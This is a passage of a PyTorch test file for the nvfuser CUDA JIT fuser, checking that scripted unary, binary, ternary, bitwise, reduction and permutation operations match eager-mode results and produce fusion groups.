subgraph = self._getSubgraphInFusion(t_jit.graph_for(x, y, z))
self.assertGraphContainsExactly(subgraph, 'aten::add', 4, consider_subgraphs=False)
@unittest.skipIf(True, "Broadcast with different output not supported yet")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_multiple_output_shape(self):
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = x + 12
o1 = o + y
o2 = o + z
oo = o1.sum() + o2.sum()
return oo
t_jit = torch.jit.script(t)
x = torch.randn(32, 32, dtype=torch.float, device="cuda")
y = torch.randn(2, 32, 32, dtype=torch.float, device="cuda")
z = torch.randn(4, 32, 32, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
o = t(x, y, z)
self.assertEqual(o, jit_o)
# Currently cannot fuse this
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
@unittest.skipIf(True, "broadcast on branches can't be resolved yet")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_multiple_output(self):
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = x + 12
o1 = o + y
o2 = o + z
oo = o1.sum() + o2.sum()
return oo
t_jit = torch.jit.script(t)
x = torch.randn(32, 32, dtype=torch.float, device="cuda")
y = torch.randn(4, 32, 32, dtype=torch.float, device="cuda")
z = torch.randn(4, 32, 32, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
o = t(x, y, z)
self.assertEqual(o, jit_o)
# Currently cannot fuse this
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
def _unary_test_helper(self, operation, dtype, random_data):
gradient_check = (dtype == torch.float64) and random_data
shape = (8, 7)
torch.cuda.manual_seed_all(211)
# need additional def of t for boolean ops
def t(x: torch.Tensor, y: torch.Tensor):
o = x * y
o = o + 5e-3
o = operation(o)
return o
y = torch.rand(shape, dtype=torch.float32, device="cuda", requires_grad=gradient_check)
y = y.to(dtype=dtype)
if random_data:
x = torch.rand(shape, dtype=torch.float32, device="cuda", requires_grad=gradient_check)
if dtype in self.int_types:
# prefer a larger variance for integer types
x = x * 5
x = x.to(dtype=dtype)
else:
x = self.special_values.to(dtype=dtype)
try:
ref = t(x, y)
except Exception:
# same way as TE checker, if eager mode throws, ignore this test
return
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
if gradient_check:
if jit_o.dtype != torch.bool:
# bool dtype has no `-`
gradcheck(t_jit, [x, y], nondet_tol=1e-5)
elif dtype in self.support_tensor_dtypes:
self.assertGraphContains(t_jit.graph_for(x, y), FUSION_GUARD)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("failing case {}\n{}\n{}\n{}".format(dtype, operation, x, y), o, jit_o, 1e-2))
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_unary_ops(self):
data_types = [
*self.int_types,
torch.float16,
torch.float32,
torch.float64
]
if TEST_BF16:
data_types.append(torch.bfloat16)
operations = [torch.neg,
torch.abs,
torch.log,
torch.log10,
torch.log1p,
torch.log2,
torch.lgamma,
torch.exp,
torch.expm1,
torch.erf,
torch.erfc,
torch.cos,
torch.acos,
torch.cosh,
torch.sin,
torch.asin,
torch.sinh,
torch.tan,
torch.atan,
torch.sqrt,
torch.rsqrt,
torch.ceil,
torch.floor,
torch.round,
torch.trunc,
torch.frac,
torch.reciprocal,
torch.isfinite,
torch.isinf,
torch.isnan,
torch.isneginf,
torch.isposinf,
torch.isreal,
torch.nn.functional.softplus,
torch.nn.functional.gelu,
torch.relu,
torch.sigmoid,
torch.bitwise_not,
torch.tan,
torch.tanh,
torch.nn.functional.silu]
for op, dtype in itertools.product(operations, data_types):
self._unary_test_helper(op, dtype, False) # test special numbers
self._unary_test_helper(op, dtype, True) # test random data
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_category_rule(self):
def run_tensor(x, z):
def t(x: torch.Tensor, z: torch.Tensor):
o = x + z
o = torch.abs(o)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, z)
jit_o = t_jit(x, z)
o = t(x, z)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, z), FUSION_GUARD)
def run_scalar(x, z):
def t(x: torch.Tensor, z: float):
o = x + z
o = torch.abs(o)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, z)
jit_o = t_jit(x, z)
o = t(x, z)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, z), FUSION_GUARD)
# n-dim with 0-dim (no type-promote)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
z = torch.tensor(2.0, dtype=torch.double, device="cuda")
run_tensor(x, z)
# n-dim with 0-dim (type-promote)
x = torch.randn(4, 8, 32, 32, device="cuda").to(dtype=torch.long)
z = torch.tensor(2.0, dtype=torch.double, device="cuda")
run_tensor(x, z)
# n-dim with n-dim (type-promote)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
z = torch.randn(4, 8, 32, 32, dtype=torch.double, device="cuda")
run_tensor(x, z)
# n-dim with scalar (no type-promote)
x = torch.randn(4, 8, 32, 32, dtype=torch.float16, device="cuda")
z = torch.tensor(3., dtype=torch.double)
run_scalar(x, z)
if TEST_BF16:
# n-dim with scalar (no type-promote)
x = torch.randn(4, 8, 32, 32, dtype=torch.bfloat16, device="cuda")
z = torch.tensor(3., dtype=torch.double)
run_scalar(x, z)
# n-dim with scalar (type-promote)
x = torch.randn(4, 8, 32, 32, device="cuda").to(dtype=torch.long)
z = torch.tensor(3., dtype=torch.double)
run_scalar(x, z)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_unary_bitwise(self):
def bit_not(x: torch.Tensor):
return ~(x + 1)
jitted = torch.jit.script(bit_not)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda").mul(5).to(torch.long)
jit_o = bit_not(x)
jit_o = bit_not(x)
o = bit_not(x)
self.assertEqual(o, jit_o)
jitted.graph_for(x) # Shows up in second instance, not first
self.assertGraphContains(jitted.graph_for(x), FUSION_GUARD)
def bool_not(x: torch.Tensor, y: torch.Tensor):
return ~(x & y)
jitted = torch.jit.script(bool_not)
x = torch.rand(4, 8, 32, 32, dtype=torch.float, device="cuda").round().to(torch.bool)
y = torch.rand(4, 8, 32, 32, dtype=torch.float, device="cuda").round().to(torch.bool)
jit_o = bool_not(x, y)
jit_o = bool_not(x, y)
o = bool_not(x, y)
self.assertEqual(o, jit_o)
jitted.graph_for(x, y) # Shows up in second instance, not first
self.assertGraphContains(jitted.graph_for(x, y), FUSION_GUARD)
def _get_scalar_binary_test_fn(self, category_and_type1, category_and_type2, operation):
category1, dtype_arg1 = category_and_type1
category2, dtype_arg2 = category_and_type2
def t_intx_tensory(x: int, y: torch.Tensor):
o = operation(x, y)
o = 2 + o
return o
def t_doublex_tensory(x: float, y: torch.Tensor):
o = operation(x, y)
o = 2 + o
return o
# Omit both scalar cases and swap cases
assert category1 == "scalar" and category2 != "scalar"
if dtype_arg1.is_floating_point:
return t_doublex_tensory
if dtype_arg1 == torch.int64 or dtype_arg1 == torch.int32:
return t_intx_tensory
raise NotImplementedError
def _binary_test_helper(self, operation, dtypes, random_data, categories="ndim"):
if isinstance(dtypes, tuple):
dtype_arg1, dtype_arg2 = dtypes
else:
dtype_arg1 = dtype_arg2 = dtypes
if isinstance(categories, tuple) and random_data:
category1, category2 = categories
elif not random_data:
category1 = category2 = "ndim"
else:
category1 = category2 = categories
def is_cpu_category(x):
return x == "0dimcpu" or x == "scalar"
# skip unsupported cases
if is_cpu_category(category1) and is_cpu_category(category2):
return
# only test cases with first operand as scalar
if category2 == "scalar":
return
# skip ops that doesn't support scalar inputs in eager
if operation in [
torch.atan2,
torch.max,
torch.min,
torch.remainder, # unsupported in nvfuser
]:
if category1 == "scalar" or category2 == "scalar":
return
if operation in [
torch.fmod,
torch.eq,
torch.ne,
torch.ge,
torch.gt,
torch.le,
torch.lt
]:
if category1 == "scalar":
return
# operators that does not support bfloat16
if operation in [torch.fmod]:
if dtype_arg1 == torch.bfloat16 or dtype_arg2 == torch.bfloat16:
return
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = operation(x, y)
o = o + z
return o
shape = (4, 32, 32)
shapex = shape if category1 == "ndim" else ()
shapey = shape if category2 == "ndim" else ()
if random_data:
x = (torch.randn(shapex, dtype=torch.float, device="cuda") * 5).to(dtype_arg1)
y = (torch.randn(shapey, dtype=torch.float, device="cuda") * 5).to(dtype_arg2)
else:
x = self.special_values.to(dtype=dtype_arg1)
y = (torch.rand_like(self.special_values) * 5).to(dtype_arg2)
r"""
Category conversion
"""
has_scalar = False
if category1 == "scalar":
has_scalar = True
x = x.item()
if category1 == "0dimcpu":
x = x.to(device="cpu")
if category2 == "scalar":
has_scalar = True
y = y.item()
if category2 == "0dimcpu":
y = y.to(device="cpu")
z = torch.tensor([2], device="cuda").to(dtype_arg1)
is_dtype_arg1_int = dtype_arg1 == torch.int32 or dtype_arg1 == torch.int64
is_dtype_arg2_int = dtype_arg2 == torch.int32 or dtype_arg2 == torch.int64
if operation in [torch.pow]:
if is_dtype_arg1_int and is_dtype_arg2_int:
if category2 == "scalar":
# RuntimeError: Integers to negative integer powers are not allowed
y = abs(y)
if category2 == "0dimcpu" and y == -1:
# https://github.com/pytorch/pytorch/issues/73196
y = y - 1
if category2 == "0dimcpu" and y == -2:
# avoid pow(0, -2), which gives inconsistent results on integer tensor
y = y - 1
# Avoid division by zero for integer tensors
div_like = [torch.div, torch.fmod, torch.remainder]
if operation in div_like and (dtype_arg2 == torch.int32 or dtype_arg2 == torch.int64):
y[y == 0] = 1
test_value = True
if dtype_arg1 == torch.half or dtype_arg2 == torch.half:
test_value = False
if dtype_arg1 == torch.bfloat16 or dtype_arg2 == torch.bfloat16:
test_value = False
try:
if not has_scalar:
o = t(x, y, z)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
self.assertEqual(o.dtype, jit_o.dtype)
if test_value:
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
elif category2 != "scalar": # only test the case where first is scalar
test_fn = self._get_scalar_binary_test_fn((category1, dtype_arg1), (category2, dtype_arg2), operation)
o = test_fn(x, y)
t_jit = torch.jit.script(test_fn)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
if test_value:
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y), FUSION_GUARD)
except Exception as e:
print("failing test for op: ", operation.__name__)
print("with input\n\tx: ", x)
print("\ty: ", y)
print("\tz: ", z)
raise e
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_binary_ops(self):
# disabled bf16 / fp16 data types because of accuracy tolerance
data_types = [
torch.int32,
torch.int64,
torch.float16,
torch.float32,
torch.float64
]
if TEST_BF16:
data_types.append(torch.bfloat16)
operations = [torch.mul,
torch.div,
torch.atan2,
torch.max,
torch.min,
torch.pow,
torch.remainder,
torch.fmod,
torch.eq,
torch.ne,
torch.ge,
torch.gt,
torch.le,
torch.lt]
category_types = [
"scalar",
"0dim",
"0dimcpu",
"ndim"
]
binary_dtype_combinations = list(itertools.combinations(data_types, 2))
category_combinations = list(itertools.combinations(category_types, 2))
for op, dtypes, categories in itertools.product(operations, binary_dtype_combinations, category_combinations):
self._binary_test_helper(op, dtypes, True, categories) # random data
for op, dtypes in itertools.product(operations, binary_dtype_combinations):
self._binary_test_helper(op, dtypes, False) # special numbers
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_binary_bitwise(self):
def jit_or(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
return (x & y) | z
def jit_xor(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
return (x & y) ^ z
def jit_lshift(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
return (x & y) << z
def jit_rshift(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
return (x & y) >> z
for jit_func in [jit_or, jit_xor, jit_lshift, jit_rshift]:
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda").mul(5).to(torch.long)
y = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda").mul(5).to(torch.long)
z = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda").mul(2).to(torch.long)
jitted = torch.jit.script(jit_func)
jit_o = jitted(x, y, z)
jit_o = jitted(x, y, z)
o = jit_func(x, y, z)
self.assertEqual(o, jit_o)
self.assertGraphContains(jitted.graph_for(x, y, z), FUSION_GUARD)
# We shouldn't need this redefinition of the function, but otherwise it won't recompile for a new type
def jit_or(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
return (x & y) | z
def jit_xor(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
return (x & y) ^ z
for jit_func in [jit_or, jit_xor]:
x = torch.rand(4, 2, dtype=torch.float, device="cuda").round().to(torch.bool)
y = torch.rand(4, 2, dtype=torch.float, device="cuda").round().to(torch.bool)
z = torch.rand(4, 2, dtype=torch.float, device="cuda").round().to(torch.bool)
jitted = torch.jit.script(jit_func)
jit_o = jitted(x, y, z)
jit_o = jitted(x, y, z)
o = jit_func(x, y, z)
self.assertEqual(o, jit_o)
self.assertGraphContains(jitted.graph_for(x, y, z), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_type_as_op(self):
def t(x: torch.Tensor, y: torch.Tensor, z: float):
o = torch.lt(x, z)
o = o.type_as(y)
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 0.5)
jit_o = t_jit(x, y, 0.5)
o = t(x, y, 0.5)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, 0.5), FUSION_GUARD)
def _ternary_integer_test_helper(self, dtype_arg1):
shape = (4, 8, 32, 32)
magnitude = 100
if (dtype_arg1 in self.int_types):
x = torch.randint(-magnitude, magnitude, shape, dtype=dtype_arg1, device="cuda")
else:
x = torch.randn(shape, dtype=dtype_arg1, device="cuda") * magnitude
arg2 = int(0)
arg3 = int(magnitude * 0.1)
def clamp0(x: torch.Tensor, f: int):
o = 2. * torch.clamp(x, min=f)
return o
clamp0_jit = torch.jit.script(clamp0)
self._run_helper(clamp0_jit, clamp0, x, arg2)
def clamp1(x: torch.Tensor, f: int, ff: int):
o = 2. * torch.clamp(x, min=f, max=ff)
return o
clamp1_jit = torch.jit.script(clamp1)
self._run_helper(clamp1_jit, clamp1, x, arg2, arg3)
def clamp2(x: torch.Tensor, f: float, ff: int):
o = 2. * torch.clamp(x, min=f, max=ff)
return o
clamp2_jit = torch.jit.script(clamp2)
self._run_helper(clamp2_jit, clamp2, x, float(arg2), arg3)
def clamp3(x: torch.Tensor, f: int, ff: float):
o = 2. * torch.clamp(x, min=f, max=ff)
return o
clamp3_jit = torch.jit.script(clamp3)
self._run_helper(clamp3_jit, clamp3, x, arg2, float(arg3))
def threshold(x: torch.Tensor, th: int, val: int):
o = 2. * torch.threshold(x, th, val)
return o
threshold_jit = torch.jit.script(threshold)
self._run_helper(threshold_jit, threshold, x, arg2, arg3)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_ternary_ops_integer_compatibility(self):
data_types = [
torch.float16,
torch.float32,
torch.float64
]
for dtype in data_types:
self._ternary_integer_test_helper(dtype)
def _ternary_test_helper(self, operation, dtypes, random_data):
if isinstance(dtypes, tuple):
dtype_arg1, dtype_arg2, dtype_arg3 = dtypes
else:
dtype_arg1 = dtype_arg2 = dtype_arg3 = dtypes
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor, alpha: torch.Tensor):
o = operation(x, y, z)
o = o + alpha
return o
shape = (4, 32, 32)
if operation is torch.where:
dtype_arg1 = torch.bool
if random_data:
x = torch.randint(0, 2, shape).to(dtype=torch.bool, device="cuda")
y = (torch.randn(shape, dtype=torch.float, device="cuda") * 5).to(dtype_arg2)
z = (torch.randn(shape, dtype=torch.float, device="cuda") * 5).to(dtype_arg3)
else:
x = torch.randint(0, 2, self.special_values.size()).to(dtype=torch.bool, device="cuda")
y = self.special_values.to(dtype=dtype_arg2)
z = (torch.rand_like(self.special_values) * 5).to(dtype_arg3)
elif random_data:
x = (torch.randn(shape, dtype=torch.float, device="cuda") * 5).to(dtype_arg1)
y = (torch.randn(shape, dtype=torch.float, device="cuda") * 5).to(dtype_arg2)
z = (torch.randn(shape, dtype=torch.float, device="cuda") * 5).to(dtype_arg3)
else:
x = self.special_values.to(dtype=dtype_arg1)
y = (torch.rand_like(self.special_values) * 5).to(dtype_arg2)
z = (torch.rand_like(self.special_values) * 5).to(dtype_arg3)
alpha = torch.tensor([2], device="cuda").to(dtype_arg1)
o = t(x, y, z, alpha)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y, z, alpha)
jit_o = t_jit(x, y, z, alpha)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_ternary_ops_type_promotion(self):
# TODO: update accuracy tolerance for bf16 / fp16 data types
data_types = [
# torch.float16,
torch.float32,
torch.float64
]
'''
if TEST_BF16:
data_types.append(torch.bfloat16)
'''
# TODO: Add Tensor support for clamp
operations = [torch.clamp]
ternary_dtype_combinations = itertools.combinations(data_types, 3)
for op, dtypes in itertools.product(operations, ternary_dtype_combinations):
self._ternary_test_helper(op, dtypes, True) # random data
self._ternary_test_helper(op, dtypes, False) # special numbers
# We can't test the scalar version of rsub from python
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING, "Requires fusion optimization pass to be effective")
def test_rsub(self):
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
def rsub(x: torch.Tensor, y: torch.Tensor):
o = torch.rsub(x, y)
o = o * 2.
return o
rsub_jit = torch.jit.script(rsub)
self._run_helper(rsub_jit, rsub, x, y)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
# legacy fuser does not work for rand_like, see issue #34361
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING, "Requires fusion optimization pass to be effective")
def test_ternary_ops(self):
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
z = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
cond = torch.randint(0, 2, (4, 8, 32, 32)).to(dtype=torch.bool, device="cuda")
def add(x: torch.Tensor, other: torch.Tensor, alpha: float):
o = torch.relu(x)
o = torch.add(o, other=other, alpha=alpha)
return o
add_jit = torch.jit.script(add)
self._run_helper(add_jit, add, x, y, 2.0)
def clamp0(x: torch.Tensor, f: float):
o = 2. * torch.clamp(x, min=f)
return o
clamp0_jit = torch.jit.script(clamp0)
self._run_helper(clamp0_jit, clamp0, x, 0.5)
def clamp1(x: torch.Tensor, f: float, ff: float):
o = 2. * torch.clamp(x, min=f, max=ff)
return o
clamp1_jit = torch.jit.script(clamp1)
self._run_helper(clamp1_jit, clamp1, x, -0.2, 0.7)
def threshold(x: torch.Tensor, th: float, val: float):
o = 2. * torch.threshold(x, th, val)
return o
threshold_jit = torch.jit.script(threshold)
self._run_helper(threshold_jit, threshold, x, 0.2, 0.9)
def where(x: torch.Tensor, y: torch.Tensor, cond: torch.Tensor):
o = 2. * torch.where(cond, x, y)
return o
where_jit = torch.jit.script(where)
self._run_helper(where_jit, where, x, y, cond)
def lerp(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = 2. * torch.lerp(x, y, z)
return o
lerp_jit = torch.jit.script(lerp)
self._run_helper(lerp_jit, lerp, x, y, z)
def lerp_scale(x: torch.Tensor, y: torch.Tensor, z: float):
o = 2. * torch.lerp(x, y, z)
return o
lerp_scale_jit = torch.jit.script(lerp_scale)
self._run_helper(lerp_scale_jit, lerp_scale, x, y, 0.5)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING, "Requires profiling node to run cuda fuser")
def test_addcmul_ops(self):
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
z = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
def addcmul(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor, value: float):
o = torch.add(x, 0.5)
o = torch.addcmul(o, y, z, value=value)
return o
addcmul_jit = torch.jit.script(addcmul)
self._run_helper(addcmul_jit, addcmul, x, y, z, 2.0)
def addcmul_no_alpha(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = torch.add(x, 0.5)
o = torch.addcmul(o, y, z)
return o
addcmul_no_alpha_jit = torch.jit.script(addcmul_no_alpha)
self._run_helper(addcmul_no_alpha_jit, addcmul_no_alpha, x, y, z)
def addcmul_const_alpha(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = torch.add(x, 0.5)
o = torch.addcmul(o, y, z, value=0.75)
return o
addcmul_const_alpha_jit = torch.jit.script(addcmul_const_alpha)
self._run_helper(addcmul_const_alpha_jit, addcmul_const_alpha, x, y, z)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_dynamic_size(self):
old_guard = torch._C._jit_set_nvfuser_guard_mode(True)
torch._C._jit_set_bailout_depth(20)
def t(x: torch.Tensor, y: torch.Tensor, z: float):
o = x + y
o = o + z
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(32, 32, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
subgraph = self._getSubgraphInFusion(t_jit.graph_for(x, y, 2.0))
self.assertGraphContainsExactly(subgraph, 'aten::add', 2, consider_subgraphs=False)
# this test is not ideal, as we rely on the bailout to test it and we
# don't know a way to verify the bailout graph to validate the proper
# fusion.
x = torch.randn(8, 32, 16, 8, dtype=torch.float, device="cuda")
y = torch.randn(16, 8, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, 2.0), FUSION_GUARD)
x = torch.randn(8, 17, 8, dtype=torch.float, device="cuda")
y = torch.randn(8, 17, 1, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, 2.0), FUSION_GUARD)
torch._C._jit_set_nvfuser_guard_mode(old_guard)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_random_topo(self):
os.environ["PYTORCH_NVFUSER_DISABLE_FALLBACK"] = "1"
self.assertTrue(runDefaultTestWithSeed(28449))
def _compare(self, desc, inp1, inp2, error):
a = inp1.clone()
b = inp2.clone()
close = torch.allclose(a, b, rtol=error, atol=error)
if not close:
print(desc, close)
z = a - b
index = (torch.abs(z) >= error + error * torch.abs(b)).nonzero()
print("dif : ", z[index])
print("inp1 : ", a[index])
print("inp2 : ", b[index])
print("maximum difference", z[index].max())
return close
# Permutation helper that applies binary operation between two tensors:
# 1. applies separate permutation `perm0` & `perm1` to two inputs
# 2. reduce dimension `broadcast_axis` of operand two to size 1
# The purpose of this test is to ensure permutation works well in
# complicated cases with arbitrary stride order and broadcasting dimensions
def _permutation_helper(self, sizes, broadcast_axis, dtype, device, perm0, perm1):
def t(x: torch.Tensor, y: torch.Tensor):
o = torch.add(x, y)
o = torch.relu(o)
return o
x = torch.randn([sizes[i] for i in perm0], dtype=dtype, device=device).permute(
[perm0.index(i) for i in range(len(sizes))])
if broadcast_axis >= 0:
sizes[broadcast_axis] = 1
y = torch.randn([sizes[i] for i in perm1], dtype=dtype, device=device).permute(
[perm1.index(i) for i in range(len(sizes))])
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertEqual(o.stride(), jit_o.stride())
self.assertGraphContains(t_jit.graph_for(x, y), FUSION_GUARD)
# end-2-end test of permutation & contiguity handling in integration.
# we are testing inputs with all combination of permutation order, just to
# ensure that integration would be able to generate functionally correct
# kernels
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_binary_ops_permutation(self):
# note that num_dim is exclusive from len(x), so we are not reducing
# to single element (codegen limitation at this moment)
x = [7, 8, 12]
b_axes = range(-1, len(x))
for b_axis in b_axes:
for perm0 in itertools.permutations(range(len(x))):
for perm1 in itertools.permutations(range(len(x))):
x = [7, 8, 12]
self._permutation_helper(x, b_axis, torch.float32, "cuda", perm0, perm1)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_binary_ops_channels_last_with_bcast(self):
device = "cuda"
x = torch.randn([4, 3, 2, 5], device=device).to(memory_format=torch.channels_last)
w = torch.randn([2, 5], device=device)
def t(x: torch.Tensor, b: torch.Tensor):
o = x + b
return torch.relu(o)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, w)
jit_o = t_jit(x, w)
jit_o = t_jit(x, w)
o = t(x, w)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, 1e-4))
self.assertGraphContains(t_jit.graph_for(x, w), FUSION_GUARD)
def _reduction_helper(self, sizes, reduction_axis, dtype, device, perm0, perm1, keepdim=False):
class MyReduction(torch.nn.Module):
__constants__ = ['reduction_axis', 'keepdim']
def __init__(self):
super(MyReduction, self).__init__()
self.reduction_axis = reduction_axis
self.keepdim = keepdim
def forward(self, x: torch.Tensor, y: torch.Tensor):
o = torch.add(x, y)
o = torch.sum(o, dim=self.reduction_axis, keepdim=self.keepdim)
return o
t = MyReduction()
x = torch.randn([sizes[i] for i in perm0], dtype=dtype, device=device).permute(
[perm0.index(i) for i in range(len(sizes))])
y = torch.randn([sizes[i] for i in perm1], dtype=dtype, device=device).permute(
[perm1.index(i) for i in range(len(sizes))])
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
# numerical issues here due to our scheduling.
# can't use `self.assertEqual(o, jit_o)`
self.assertTrue(self._compare("comparing output failed", o, jit_o, 1e-4))
self.assertGraphContains(t_jit.graph_for(x, y), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_reduction(self):
for x in ([7, 8, 12], [12, 8, 7, 9, 15], [128, 16, 8, 32]):
# note that num_dim is exclusive from len(x), so we are not reducing
# to single element (codegen limitation at this moment)
for num_reduce_dim in range(1, len(x)):
for axes in itertools.combinations(range(len(x)), num_reduce_dim):
for keepdim in (True, False):
perm0 = range(len(x))
perm1 = range(len(x))
self._reduction_helper(x, axes, torch.float32, "cuda", perm0, perm1, keepdim)
def _layer_norm_autodiff_helper(self, model, grad, shapes, args):
jit_model = torch.jit.script(model)
eps = np.random.random() * 1e-4
use_cudnn = bool(np.random.randint(0, 2))
# profile/optimization runs
for i in range(3):
